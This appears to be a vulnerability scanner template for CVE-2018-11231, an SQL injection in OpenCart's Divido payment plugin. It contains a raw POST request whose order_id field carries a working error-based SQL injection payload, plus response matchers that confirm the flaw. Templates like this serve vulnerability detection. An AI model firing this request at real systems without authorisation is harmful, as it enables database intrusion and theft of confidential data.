id: CVE-2018-11231 info: name: Opencart Divido plugin - Sql Injection author: ritikchaddha severity: high reference: - http://foreversong.cn/archives/1183 - https://nvd.nist.gov/vuln/detail/CVE-2018-11231 tags: opencart,sqli,cve,cve2018 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.10 cve-id: CVE-2018-11231 cwe-id: CWE-89 description: "In the Divido plugin for OpenCart, there is SQL injection. Attackers can use SQL injection to get some confidential information." requests: - raw: - | POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1 Host: {{Hostname}} {"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5(202072102)),0x7e),1)"},"status":2} redirects: true max-redirects: 2 matchers-condition: and matchers: - type: word part: body words: - "6f7c6dcbc380aac3bcba1f9fccec991e" - type: status status: - 200